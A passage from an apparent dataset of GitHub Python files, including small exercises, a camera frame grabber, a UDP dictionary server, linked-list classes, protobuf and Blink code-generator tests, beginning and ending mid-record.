else:\n value = float(value) + amount\n\n self.data[key] = str(value)\n\n return value\n","repo_name":"dacut/meterer","sub_path":"tests/fake_cache.py","file_name":"fake_cache.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70111500644","text":"'''\n Escreva um programa que receba dez inserções do usuário e imprima a metade de\ncada um deles, a soma total e a média aritmética.\n'''\nsoma = 0\nn = range(10)\nfor i in n:\n\n valor = int(input(f'Digite o {i+1}º valor: '))\n print(f'A Metade de {valor} = {valor/2}\\n')\n soma = soma+valor\nprint(f'SOMATORIO: {soma}\\nMEDIA: {soma/10}')","repo_name":"FllavioAndrade/exercicio-python","sub_path":"ufrn-poo/aula-4/exercicio-2.py","file_name":"exercicio-2.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12568313434","text":"import cv2\n\ncamera_index = '/dev/video2'\n\ndef export_camera_frame(_output_filename):\n # Open the camera\n cap = cv2.VideoCapture(camera_index)\n\n # Check if the camera is opened successfully\n if not cap.isOpened():\n print(f\"Error: Could not open camera {camera_index}\")\n return\n\n # Read a single frame from the camera\n ret, frame = cap.read()\n\n # Check if the frame is read successfully\n if not ret:\n print(\"Error: Could not read frame from the camera\")\n cap.release()\n return\n\n # Save the frame as a JPG image\n cv2.imwrite(_output_filename, frame)\n\n # Release the camera\n cap.release()\n\n print(f\"Frame exported as {output_filename}\")\n\noutput_filename = \"output_image.jpg\" # Change this to the desired output filename\nexport_camera_frame(output_filename)\n","repo_name":"acsii-63/cloud-based","sub_path":"unit_demo/model/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13468454687","text":"'''\nHomework 4 - Upsampling\nCoding part 2\n'''\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\ndef from_text(filename):\n data = []\n label = []\n with open(filename, 'r') as infile:\n for line in infile.readlines():\n x, y, lb = line.split()\n data.append([float(x), float(y)])\n label.append([float(lb)])\n data = np.asarray(data)\n label = np.asarray(label)\n return data, label\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport PIL.Image as Image\n\n# import torchvision\n# from torchvision import models, transforms, utils\n\nclass ImbaDataset(Dataset):\n def __init__(self, root_path, mode='train'):\n self.meta = {'root_path': root_path,\n 'mode': mode}\n assert mode in ['train', 'test']\n if mode == 'train':\n data, label = from_text(os.path.join(root_path, 'samplestr.txt'))\n elif mode == 'test':\n data, label = from_text(os.path.join(root_path, 'sampleste.txt'))\n \n self.dataset = data \n self.label = label\n\n def __len__(self):\n return len(self.label)\n\n def __getitem__(self, index):\n return {'data': torch.from_numpy(self.dataset[index]),\n 'label': torch.from_numpy(self.label[index])}\n\ndef plot_dataset(data, label):\n true_mask = label.reshape((-1)).astype(bool)\n false_mask = (1-label).reshape((-1)).astype(bool)\n\n data_true = np.transpose(data[true_mask])\n data_false = np.transpose(data[false_mask])\n\n print('samples with positive class:', len(data_true[0]),\n '\\nsamples with negative class:', len(data_false[0]))\n\n plt.figure()\n plt.plot(data_true[0], data_true[1], '.b')\n plt.plot(data_false[0], data_false[1], '.r')\n\ndef draw_model(model):\n w = model.state_dict()['fc.weight']\n b = model.state_dict()['fc.bias']\n w1 = w[0,0].item()\n w2 = w[0,1].item()\n b1 = b[0].item()\n\n m = -w1/w2\n c = -b1/w2\n\n line_x = [ i/100 for i in range(-300, 700)]\n line_y = [ m*i + c for i in line_x]\n \n shade_x = [line_x[0], line_x[-1]]\n shade_y = [line_y[0], line_y[-1]]\n\n if w2 > 0:\n shade_y += [max(shade_y)]\n if m > 0:\n shade_x += [min(shade_x)]\n else:\n shade_x += [max(shade_x)]\n else:\n shade_y += [min(shade_y)]\n if m > 0:\n shade_x += [max(shade_x)]\n else:\n shade_x += [min(shade_x)]\n\n # plot_dataset(data_tr, label_tr)\n plt.plot(line_x, line_y, '.m', lw=1)\n# plt.line()\n plt.fill(shade_x, shade_y, '.c')","repo_name":"ghosalya/arti-intel","sub_path":"week4/hw4_code2.py","file_name":"hw4_code2.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8223764376","text":"# Definition for singly-linked list.\n\n\nclass Node:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def reverseList(self, head: Node) -> Node:\n \n cur=head\n new=None\n \n while cur != None:\n temp=cur.next\n cur.next=new\n new=cur\n cur=temp\n \n return new\n\n\na=Solution()\n\n\n","repo_name":"cosmo9873/practice","sub_path":"linkedlist2.py","file_name":"linkedlist2.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28950862584","text":"import unit\nimport game_board\nimport visualize\nimport time\n\ncc = unit.Cc(1, (0,1))\nz1 = unit.Zu(2, (4,0))\nz2 = unit.Zu(3, (4,3))\nz3 = unit.Zu(4, (3,1))\nz4 = unit.Zu(5, (3,2))\nmc = unit.Shu(6, (0,0))\nzy = unit.Shu(7, (0,3))\nzf = unit.Shu(8, (2,3))\nhz = unit.Shu(9, (2,0))\ngy = unit.Heng(10, (2,1))\n\n\nall_units = [cc, z1, z2, z3, z4, mc, zy, zf, hz, gy]\nnew_board = game_board.Board(all_units)\n\nvisited = {}\nqueue = []\nvisited[new_board.to_string().tobytes()] = True\nqueue.append(new_board) \nprint(\"start: \")\nprint(new_board.to_int())\nstart = time.time()\nfinal_board = game_board.BFS(queue, visited)\nend = time.time()\nprint(\"finished in \" + str(end-start))\nif final_board is None:\n print(\"Unsolvable\")\nelse:\n trace = []\n temp = final_board\n while temp.parent is not None:\n trace.append(temp)\n temp = temp.parent\n\ntrace = trace[::-1]\nvisualize.to_image(trace, \"./solutions/hengdaolima/\")\nvisualize.to_video(\"./solutions/hengdaolima/\", \"hengdao.mp4\")","repo_name":"HuaxuanGAO/HuaRongDao","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74900917284","text":"from befunge.language import Instructions\nfrom befunge.core import Cell\n\nimport re\n\nclass Parser(object):\n def __init__(self, content):\n self.content = content \n\n def lex_char(self, c):\n kind = 'CHAR'\n\n for i, r in Instructions:\n match = r.search(c)\n\n if match:\n kind = i\n\n return {'kind': kind, 'value': c}\n \n def get_program(self):\n rows = []\n column = []\n for line in self.content.splitlines():\n for char in line:\n column.append(self.lex_char(char))\n\n rows.append(column)\n column = []\n \n return rows\n","repo_name":"jdiez17/befunge","sub_path":"befunge/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12995996626","text":"import numpy as np \nimport matplotlib.pyplot as plt\n\nN = 512\nL = 4\nK = 4\n\nSYMBOLS = np.array([1+1j, -1+1j, 1-1j, -1-1j])\n\nn_sigma2 = 0.01\n\n# channel parameters\nc_sigma = 0.5 ** 0.5 \t\nlambda_ = 1\np = np.exp(-lambda_ * (np.arange(1,L+1) - 1)).reshape((L,1))\na = np.random.normal(0, c_sigma, (L,1))\nb = np.random.normal(0, c_sigma, (L,1))\nnorm_p = np.sum(p**2)\n# h0 is the true channel impulse response vector\nh0 = ((a + 1j*b)*p)/norm_p\t# h[k] = (a[k] + jb[k])p[k] / norm(p)\n\ndef plot_channel(hplot, label):\n\tplt.figure()\n\tplt.subplot(2,1,1)\n\tplt.title(label + ' Real and Imaginary')\n\tplt.grid(True)\n\tplt.stem([(hh[0]).real for hh in h0], linefmt='g-', markerfmt='go', label='Original', use_line_collection=True)\n\tplt.stem([(hh[0]).real for hh in hplot], linefmt='r:', markerfmt='ro', label=label, use_line_collection=True)\n\tplt.legend(loc='upper right')\n\tplt.subplot(2,1,2)\n\tplt.grid(True)\n\tplt.stem([(hh[0]).imag for hh in h0], linefmt='g-', markerfmt='go', label='Original', use_line_collection=True)\n\tplt.stem([(hh[0]).imag for hh in hplot], linefmt='r:', markerfmt='ro', label=label, use_line_collection=True)\n\tplt.legend(loc='upper right')\n\n\n# Fourier Matrix\nF = np.array([ [ np.exp((np.pi*2j*i*j)/N) for j in range(L)] for i in range(N)])\nFH = F.conjugate().T\n\ndef P_gaussian(y, h, x, sigma2, beta):\n\tN = y.size\n\tdist2 = np.abs((x*(F.dot(h)) - y)).reshape(N)**2\n\tval = ((1/(2*np.pi*sigma2)**0.5)*np.exp(-dist2/2/sigma2))**beta\n\treturn val\n\ndef likelihood(y, h, nus, sigma2, K, beta):\n\tll = 0\n\tfor k in range(K):\n\t\tll += (nus[k]**beta)*P_gaussian(y, h, SYMBOLS[k], sigma2, beta)\n\treturn ll\n\n\n\ndef solve(y, K, L, betas=[0.6, 0.8, 1], c_sigma_est=1, lambda_est=0, thresh=1e-10, max_steps=5000, tolerance_history_thresh=1e-2, history_length=50):\n\n\tN = y.size\n\tnu_est = np.array([1./K for j in range(K)])\n\tp = np.exp(-lambda_est * (np.arange(1,L+1) - 1)).reshape((L,1))\n\ta = np.random.normal(0, c_sigma_est, (L,1))\n\tb = np.random.normal(0, c_sigma_est, (L,1))\n\n\t# initialization\n\th_est = ((a + 1j*b)*p)/(np.sum(p**2))\n\n\tsigma2_est = np.sum(np.abs(y)**2)/N\n\tprint('init', sigma2_est)\n\n\tlikelihoods = []; beta_step = []; steps = 0;\n\th_ests = [h_est.copy()]\n\n\tactual_likelihood = np.sum(np.log(likelihood(y, h0, np.array([0.25, 0.25, 0.25, 0.25]) , n_sigma2, K, 1) + 1e-11))/N\n\tlikelihoods.append(np.sum(np.log(likelihood(y, h_est, nu_est, sigma2_est, K, 1) + 1e-11))/N)\n\t\n\tfor beta in betas:\n\t\tprint('Maximization for beta = {}'.format(beta))\n\n\t\tif beta!=1:\n\t\t\th_est += 1*np.random.randn(L,1)\n\n\t\tllh_01 = likelihood(y, h_est, nu_est, sigma2_est, K, 1)\n\t\tllh_1 = likelihood(y, h_est, nu_est, sigma2_est, K, beta)\n\n\t\t# define h[k, i] = probability that xi belongs to class k\n\t\t# however, the following is being done for numerical stability\n\t\tq = np.array([(nu_est[k]**beta)*P_gaussian(y, h_est, SYMBOLS[k], sigma2_est, beta)/(llh_1+1e-9) for k in range(K-1)])\n\t\tq = np.append(q, [(1 - np.sum(q, axis=0))], axis=0)\n\t\t\n\t\ttolerance_history = np.ones(history_length)\n\t\tll_history = np.ones(history_length)\n\n\t\tif beta == 1:\n\t\t\tthresh = 1e-10\n\t\t\ttolerance_history_thresh = 1e-7\n\n\t\twhile tolerance_history[-1] >= thresh and steps <= max_steps:\n\t\t\tsteps += 1\n\t\t\tprint(\"Step {}\".format(steps), end='\\r')\n\t\t\tllh_00 = llh_01.copy()\n\t\t\tllh_0 = llh_1.copy()\n\n\t\t\ttemp = np.zeros((N,1), dtype=np.complex128)\n\t\t\ttemp1 = np.zeros((N,1), dtype=np.complex128)\n\t\t\tfor k in range(K):\n\t\t\t\ttemp += np.conjugate(SYMBOLS[k])*y*(q[k].reshape((N, 1)))\n\t\t\t\ttemp1 += (np.abs(SYMBOLS[k])**2)*(q[k].reshape((N,1)) + 1e-9)\n\t\t\t\tnu_est[k] = np.sum(q[k])/N\n\n\t\t\t# print('temp', temp)\n\t\t\t# print('temp1', temp1)\n\n\t\t\tmat = np.linalg.inv(FH.dot(np.diag(temp1.reshape(N)).dot(F)))\n\t\t\th_est = mat.dot(FH.dot(temp))\n\n\t\t\tfor k in range(K):\n\t\t\t\tsigma2_est += np.sum((np.abs(SYMBOLS[k]*F.dot(h_est)-y)**2)*q[k].reshape((N,1)))\n\t\t\tsigma2_est /= N\n\n\t\t\tllh_01 = likelihood(y, h_est, nu_est, sigma2_est, K, 1)\n\t\t\tllh_1 = likelihood(y, h_est, nu_est, sigma2_est, K, beta)\n\n\t\t\tif np.max(tolerance_history) <= tolerance_history_thresh:\n\t\t\t\th_est += 1*np.random.randn(L,1)\n\n\t\t\t# The following is being done for numerical stability\n\t\t\tq = np.array([(nu_est[k]**beta)*P_gaussian(y, h_est, SYMBOLS[k], sigma2_est, beta)/(llh_1+1e-9) for k in range(K-1)])\n\t\t\tq = np.append(q, [(1 - np.sum(q, axis=0))], axis=0)\n\n\t\t\tlog_ll0 = np.log(llh_00 + 1e-11)\n\t\t\tlog_ll1 = np.log(llh_01 + 1e-11)\n\t\t\ttolerance = np.abs(((log_ll0-log_ll1)/log_ll1))\n\t\t\ttolerance_history = np.append(tolerance_history[1:], [np.max(tolerance)])\n\n\t\t\tlikelihoods.append(np.sum(log_ll1)/N) \n\t\t\tll_history = np.append(ll_history[1:], [likelihoods[-1]-likelihoods[-2]])\n\n\t\t\t# if oscillations take place\n\t\t\tif np.where(ll_history < 0)[0].size >= 33 and ll_history[-1]>0:\n\t\t\t\tif beta != 1:\n\t\t\t\t\tprint('ll break')\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\th_est += 1e-3*np.random.randn(L,1)\n\t\t\th_ests.append(h_est.copy())\n\n\t\tprint(\"Steps {} \".format(steps))\n\t\tbeta_step.append((beta, steps-1))\n\t\t# print('Beta: {} --- alpha_est: {}, mu_est: {}, sigma_est: {}'.format(beta, alpha_ests, mu_est, sigma_est))\n\treturn h_ests, sigma2_est, nu_est, beta_step, likelihoods, actual_likelihood\n\nX = np.array([SYMBOLS[int(np.random.rand()*K)] for i in range(N)]).reshape((N,1))\ny = X*(F.dot(h0)) + (0.5**0.5)*(np.random.normal(0, n_sigma2**0.5, (N,1)) + 1j*np.random.normal(0, n_sigma2**0.5, (N,1))) # process noise\n\n\nh_ests, sigma2_est, nu_est, beta_step, likelihoods, actual_likelihood = solve(y, K, L)\nprint('sigma2_est', sigma2_est)\nprint('nu_est', nu_est)\nprint('h_est', h_ests[-1])\n\nplt.figure('Y')\nplt.title('Y')\nplt.plot(np.real(y), np.imag(y), 'b.', label='Y')\nplt.plot(np.real(X), np.imag(X), 'ro', label='X')\nZ = y/(F.dot(h0))\nplt.plot(np.real(Z), np.imag(Z), 'g.', label='Z')\nplt.grid(True)\nplt.legend(loc='upper right')\n\n\n\nplt.figure('Likelihood')\nplt.title(r'Likelihoods vs. Iterations, ')#$(\\mu_1,\\mu_2)=($'+str(-mu_iter)+','+str(mu_iter)+')')\nplt.plot(likelihoods)\nplt.plot(np.repeat(actual_likelihood,len(likelihoods)), label='Actual')\t\nplt.grid(True)\n\nplot_channel(h_ests[-1], 'Est')\n\nplt.show()\n","repo_name":"2vrk1504/EstimationTheory_EE5111","sub_path":"Project/blind.py","file_name":"blind.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26552149319","text":"from typing import Final\nfrom unittest import TestCase, main\n\nfrom day_01 import parse_sorted_sums, part_1, part_2\n\n\nclass TestDay01(TestCase):\n _RAW_INPUT: Final[str] = '''1000\n2000\n3000\n\n4000\n\n5000\n6000\n\n7000\n8000\n9000\n\n10000'''\n _sorted_sums: list[int]\n\n def setUp(self):\n self._sorted_sums = parse_sorted_sums(self._RAW_INPUT)\n\n def test_parse_sorted_sums(self):\n self.assertListEqual(self._sorted_sums, [4_000, 6_000, 10_000, 11_000, 24_000])\n\n def test_part_1(self):\n self.assertEqual(part_1(self._sorted_sums), 24_000)\n\n def test_part_2(self):\n self.assertEqual(part_2(self._sorted_sums), 45_000)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rubennoriegamier/aoc_2022","sub_path":"day_01_test.py","file_name":"day_01_test.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26896095497","text":"import socket\r\nfrom threading import Thread\r\nimport os\r\nimport pickle\r\nMAX_BYTES = 65535\r\ndict = {}\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.bind(('127.0.0.1', 1080))\r\nprint('Listening at {}'.format(sock.getsockname()))\r\nwhile True:\r\n data, address = sock.recvfrom(MAX_BYTES)\r\n text = data.decode('utf-8')\r\n if text == \"editar\":\r\n with open('book.pickle','rb') as f:\r\n data = pickle.load(f)\r\n print(data)\r\n dat = [*data]\r\n dat = sorted(dat)\r\n print(dat)\r\n dato = \" \".join(dat)\r\n sock.sendto(dato.encode('utf-8'),address)\r\n j=1\r\n while j==1:\r\n newdata, address = sock.recvfrom(MAX_BYTES)\r\n newdat = newdata.decode('utf-8')\r\n print(newdat)\r\n\r\n if newdat in dat:\r\n prdat = newdat\r\n sendNow = \" \".join(data[newdat])\r\n sock.sendto(sendNow.encode('utf-8'),address)\r\n elif newdat == 'sair':\r\n j=2\r\n else:\r\n with open(\"book.pickle\", \"wb\") as f:\r\n newdat = newdat.split(\" \")\r\n if newdat[0] == '':\r\n data.pop(prdat)\r\n pickle.dump(data, f)\r\n dat = [*data]\r\n dat = sorted(dat)\r\n dato = \" \".join(dat)\r\n sock.sendto(dato.encode('utf-8'), address)\r\n else:\r\n popped = data.pop(prdat)\r\n data[newdat[0]] = newdat[1:5]\r\n pickle.dump(data,f)\r\n print(data)\r\n dat = [*data]\r\n dat = sorted(dat)\r\n dato = \" \".join(dat)\r\n sock.sendto(dato.encode('utf-8'), address)\r\n if text == \"adicionar\":\r\n data,address = sock.recvfrom(MAX_BYTES)\r\n data = data.decode('utf-8')\r\n with open(\"book.pickle\",\"rb\") as f:\r\n dici = pickle.load(f)\r\n with open(\"book.pickle\", \"wb\") as f:\r\n dat = data.split(\" \")\r\n dici[dat[0]] = dat[1:5]\r\n pickle.dump(dici,f)\r\n print(dici)\r\n if text == \"consultar\":\r\n with open(\"book.pickle\",\"rb\") as f:\r\n dic = pickle.load(f)\r\n data = [*dic]\r\n dat = \" \".join(data)\r\n sock.sendto(dat.encode('utf-8'),address)\r\n print(dic)\r\n j=1\r\n while j==1:\r\n word, address = sock.recvfrom(MAX_BYTES)\r\n word = word.decode('utf-8')\r\n print(word)\r\n if word in [*dic]:\r\n data = dic[word]\r\n print(dic[word])\r\n data = \" \".join(data)\r\n data = data.encode('utf-8')\r\n sock.sendto(data,address)\r\n elif word == \"sair\":\r\n j=2\r\n","repo_name":"otavioalbucosta/DicionarioColaborativoPython","sub_path":"Dicionário/CouchPotato.py","file_name":"CouchPotato.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73373932326","text":"#\n# @Author: Bhaskar S\n# @Blog: https: // www.polarsparc.com\n# @Date: 04 Jul 2020\n#\n\nimport CustomerAccount_pb2\n\naccount = CustomerAccount_pb2.Account()\naccount.acct_no = \"12345\"\naccount.acct_type = CustomerAccount_pb2.CA_BROKERAGE\naccount.customer.first_name = \"Bugs\"\naccount.customer.last_name = \"Bunny\"\naccount.customer.email_id = \"bugs.b@carrot.co\"\naccount.customer.phone_no.append(\"100-100-1000\")\naccount.customer.phone_no.append(\"100-100-1005\")\n\nprint(\"Account fields: %s\" % account.ListFields())\nprint(\"Account data size: %s\" % account.ByteSize())\nprint(\"Account: %s\" % account)\n\ndata = account.SerializeToString()\n\naccount2 = CustomerAccount_pb2.Account()\naccount2.ParseFromString(data)\n\nprint(\"Account deserialized: %s\" % account2)\n","repo_name":"bhaskars-repo/PyProtobuf3","sub_path":"CustomerAccountTest.py","file_name":"CustomerAccountTest.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30398978439","text":"class Node:\n \n def __init__(self, value):\n self.data = value\n self.next_data = None\n\nclass Linked_List:\n\n def __init__(self, *args):\n self.__head = None\n self.__tail = None\n self.__length = 0 \n self.__iterator = None\n if args != ():\n for i in args:\n self.append(i)\n\n def __repr__(self):\n display = \"[\"\n x = self.__head\n while x:\n if x.next_data is not None:\n display += str(x.data) + \", \"\n else:\n display += str(x.data)\n x = x.next_data\n return display + \"]\"\n \n\n def __len__(self):\n return self.__length\n\n def __getitem__(self, index):\n if isinstance(index, int):\n index = self.__neg_index_chk(index)\n \n if index < self.__length:\n x = self.__head\n i = 0\n while x:\n if i == index:\n return x.data\n x = x.next_data\n i += 1\n else:\n raise IndexError(\"index Out of range\")\n\n if isinstance(index, slice):\n obj = Linked_List()\n\n if index.start == None and index.stop == None and index.step == None:\n return self.copy()\n\n if index.start == None and index.stop != None:\n if index.step != None:\n for i in range(0, index.stop, index.step):\n obj.append(self[i])\n return obj\n else:\n for i in range(0, index.stop):\n obj.append(self[i])\n return obj\n\n if index.stop == None and index.start != None:\n if index.step != None:\n for i in range(index.start, self.__length, index.step):\n obj.append(self[i])\n return obj\n else:\n for i in range(index.start, self.__length):\n obj.append(self[i])\n return obj\n\n if index.start != None and index.stop != None:\n if index.step != None:\n for i in range(index.start, index.stop, index.step):\n obj.append(self[i])\n return obj\n else:\n for i in range(index.start, index.stop):\n obj.append(self[i])\n return obj\n\n if index.step != None and index.start == None and index.stop == None:\n for i in range(0, self.__length, index.step):\n obj.append(self[i])\n return obj\n\n def __setitem__(self, index, data):\n self.__insert(index, data, \"setitem\")\n\n def __delitem__(self, index):\n self.pop(index)\n\n def __add__(self, other):\n flag = False\n try:\n getattr(other, \"__iter__\")\n lst = Linked_List()\n for i in self:\n lst.append(i)\n for i in other:\n lst.append(i)\n return lst\n except:\n flag = True\n if flag:\n raise Exception(f\"can not add list and object of type {type(other)}\")\n\n def __iter__(self):\n self.__iterator = self.__head\n return self\n\n def __next__(self):\n if self.__iterator == None:\n self.__iterator = self.__head\n raise StopIteration\n current_val = self.__iterator.data\n self.__iterator = self.__iterator.next_data\n return current_val\n\n def __insert_first(self, data):\n x = Node(data)\n if self.__tail == None and self.__head == None:\n self.__tail = x\n self.__head = x\n self.__iterator = x\n else:\n temp = self.__head\n self.__head = x\n self.__head.next_data = temp\n self.__iterator = self.__head\n self.__length += 1\n\n def __insert(self, index, data, flag):\n if not isinstance(index, int):\n raise TypeError(\"list indexes must be inetgers\")\n \n if index < self.__length:\n if index < 0:\n index = self.__neg_index_chk(index)\n i = 0\n x = self.__head\n if flag == \"insert\":\n if index == 0:\n self.__insert_first(data)\n else:\n node = Node(data)\n while x:\n if i == index - 1:\n node.next_data = x.next_data\n x.next_data = node\n self.__length += 1\n break\n x = x.next_data\n i += 1\n elif flag == \"setitem\":\n while x:\n if i == index:\n x.data = data\n break\n x = x.next_data\n i += 1\n else:\n raise IndexError(\"index Out of range\")\n\n def __neg_index_chk(self, index):\n if index < 0:\n index = abs(index)\n if index <= self.__length:\n index = self.__length - index\n else:\n raise IndexError(\"list index out of range\")\n return index\n return index\n\n def append(self, data):\n x = Node(data)\n if self.__tail == None and self.__head == None:\n self.__tail = x\n self.__head = x\n self.__iterator = x\n else:\n self.__tail.next_data = x\n self.__tail = x\n self.__length += 1\n\n def insert(self, index, data):\n self.__insert(index, data, \"insert\")\n\n def extend(self, data):\n flag = False\n try:\n getattr(data, \"__iter__\")\n for i in data:\n self.append(i)\n except:\n flag = True\n if flag:\n raise Exception(f\"can not extend list with object of type {type(other)}\")\n\n def copy(self):\n lst = Linked_List()\n for i in self:\n lst.append(i)\n return lst\n\n def reverse(self):\n lst = Linked_List()\n self.__reverse(self.__head, lst)\n return lst\n\n def __reverse(self, x, lst):\n while x:\n self.__reverse(x.next_data, lst)\n lst.append(x.data)\n return x\n\n def remove(self, data):\n x = self.__head\n if self.__head == None and self.__tail == None:\n raise Exception(\"can not remove items from an empty list\")\n elif self.__head == self.__tail and x.data == data:\n self.__head = None\n self.__tail = None\n self.__iterator = None\n elif x.data == data:\n self.__head = x.next_data\n else:\n flag = False\n while x:\n if x.next_data.data == data:\n x.next_data = x.next_data.next_data\n flag = True\n break\n x = x.next_data\n if not flag:\n raise TypeError(f\"value {data} not found\")\n self.__length -= 1\n\n def pop(self, index = None):\n if not isinstance(index, int) and None:\n raise TypeError(\"list indexes must be integers\")\n elif isinstance(index, int) and index > self.__length:\n raise IndexError(\"list index out of range\")\n elif self.__head == None and self.__tail == None:\n raise Exception(\"can not pop items from an empty list\")\n elif self.__head == self.__tail:\n data = self.__head.data\n self.__head = None\n self.__tail = None\n self.__iterator = None\n self.__length -= 1\n return data\n else:\n x = self.__head\n if index is None:\n while x:\n if x.next_data.next_data == None:\n data = x.next_data.data\n x.next_data = None\n self.__tail = x\n self.__length -= 1\n return data\n x = x.next_data\n else:\n index = self.__neg_index_chk(index)\n i = 0\n if index == i:\n data = self.__head.data\n self.__head = self.__head.next_data\n self.__length -= 1\n return data\n while x:\n if i == index - 1:\n data = x.next_data.data\n x.next_data = x.next_data.next_data\n self.__length -= 1\n return data\n i += 1\n x = x.next_data\n\n def clear(self):\n self.__head = None\n self.__tail = None\n self.__iterator = None\n\n def count(self, data):\n ct = 0\n for i in self:\n if i == data:\n ct += 1\n return ct\n\n def index(self, data):\n index = 0\n for i in self:\n if i == data:\n return index\n index += 1\n raise TypeError(\"value not found\")\n\n def sort(self):\n lst = Linked_List()\n for i in sorted(self):\n lst.append(i)\n return lst\n\n\nif __name__ == \"__main__\":\n lst = Linked_List(1,99,5,6)\n x = lst + (7,8,48,45)\n print(x)\n print(x[:])\n","repo_name":"farooq98/linked-list-python","sub_path":"Linked List Python.py","file_name":"Linked List Python.py","file_ext":"py","file_size_in_byte":9568,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"70948965606","text":"import unittest\n\nfrom .code_node import LiteralNode\nfrom .code_node import SequenceNode\nfrom .code_node import SymbolNode\nfrom .code_node import SymbolScopeNode\nfrom .code_node import TextNode\nfrom .mako_renderer import MakoRenderer\n\n\nclass CodeNodeTest(unittest.TestCase):\n def render(self, node):\n prev = \"\"\n current = str(node)\n while current != prev:\n prev = current\n current = str(node)\n return current\n\n def assertRenderResult(self, node, expected):\n def simplify(s):\n return \" \".join(s.split())\n\n actual = simplify(self.render(node))\n expected = simplify(expected)\n\n self.assertEqual(actual, expected)\n\n def test_literal_node(self):\n \"\"\"\n Tests that, in LiteralNode, the special characters of template (%, ${},\n etc) are not processed.\n \"\"\"\n renderer = MakoRenderer()\n root = LiteralNode(\"<% x = 42 %>${x}\", renderer=renderer)\n self.assertRenderResult(root, \"<% x = 42 %>${x}\")\n\n def test_empty_literal_node(self):\n renderer = MakoRenderer()\n root = LiteralNode(\"\", renderer=renderer)\n self.assertRenderResult(root, \"\")\n\n def test_text_node(self):\n \"\"\"Tests that the template language works in TextNode.\"\"\"\n renderer = MakoRenderer()\n root = TextNode(\"<% x = 42 %>${x}\", renderer=renderer)\n self.assertRenderResult(root, \"42\")\n\n def test_empty_text_node(self):\n renderer = MakoRenderer()\n root = TextNode(\"\", renderer=renderer)\n self.assertRenderResult(root, \"\")\n\n def test_list_operations_of_sequence_node(self):\n \"\"\"\n Tests that list operations (insert, append, and extend) of SequenceNode\n work just same as Python built-in list.\n \"\"\"\n renderer = MakoRenderer()\n root = SequenceNode(renderer=renderer)\n root.extend([\n LiteralNode(\"2\"),\n LiteralNode(\"4\"),\n ])\n root.insert(1, LiteralNode(\"3\"))\n root.insert(0, LiteralNode(\"1\"))\n root.insert(100, LiteralNode(\"5\"))\n root.append(LiteralNode(\"6\"))\n self.assertRenderResult(root, \"1 2 3 4 5 6\")\n\n def test_nested_sequence(self):\n \"\"\"Tests nested SequenceNodes.\"\"\"\n renderer = MakoRenderer()\n root = SequenceNode(renderer=renderer)\n nested = SequenceNode()\n nested.extend([\n LiteralNode(\"2\"),\n LiteralNode(\"3\"),\n LiteralNode(\"4\"),\n ])\n root.extend([\n LiteralNode(\"1\"),\n nested,\n LiteralNode(\"5\"),\n ])\n self.assertRenderResult(root, \"1 2 3 4 5\")\n\n def test_symbol_definition_chains(self):\n \"\"\"\n Tests that use of SymbolNode inserts necessary SymbolDefinitionNode\n appropriately.\n \"\"\"\n renderer = MakoRenderer()\n root = SymbolScopeNode(renderer=renderer)\n\n root.register_code_symbols([\n SymbolNode(\"var1\", \"int ${var1} = ${var2} + ${var3};\"),\n SymbolNode(\"var2\", \"int ${var2} = ${var5};\"),\n SymbolNode(\"var3\", \"int ${var3} = ${var4};\"),\n SymbolNode(\"var4\", \"int ${var4} = 1;\"),\n SymbolNode(\"var5\", \"int ${var5} = 2;\"),\n ])\n\n root.append(TextNode(\"(void)${var1};\"))\n\n self.assertRenderResult(\n root, \"\"\"\nint var5 = 2;\nint var4 = 1;\nint var3 = var4;\nint var2 = var5;\nint var1 = var2 + var3;\n(void)var1;\n \"\"\")\n","repo_name":"TrellixVulnTeam/chromium_82SC","sub_path":"third_party/blink/renderer/bindings/scripts/bind_gen/code_node_test.py","file_name":"code_node_test.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14404399751","text":"def solution(s):\n num_dic = {\"zero\": \"0\",\n \"one\": \"1\",\n \"two\": \"2\",\n \"three\": \"3\",\n \"four\": \"4\",\n \"five\": \"5\",\n \"six\": \"6\",\n \"seven\": \"7\",\n \"eight\": \"8\",\n \"nine\": \"9\"}\n for word in num_dic:\n s = s.replace(word, num_dic[word])\n return 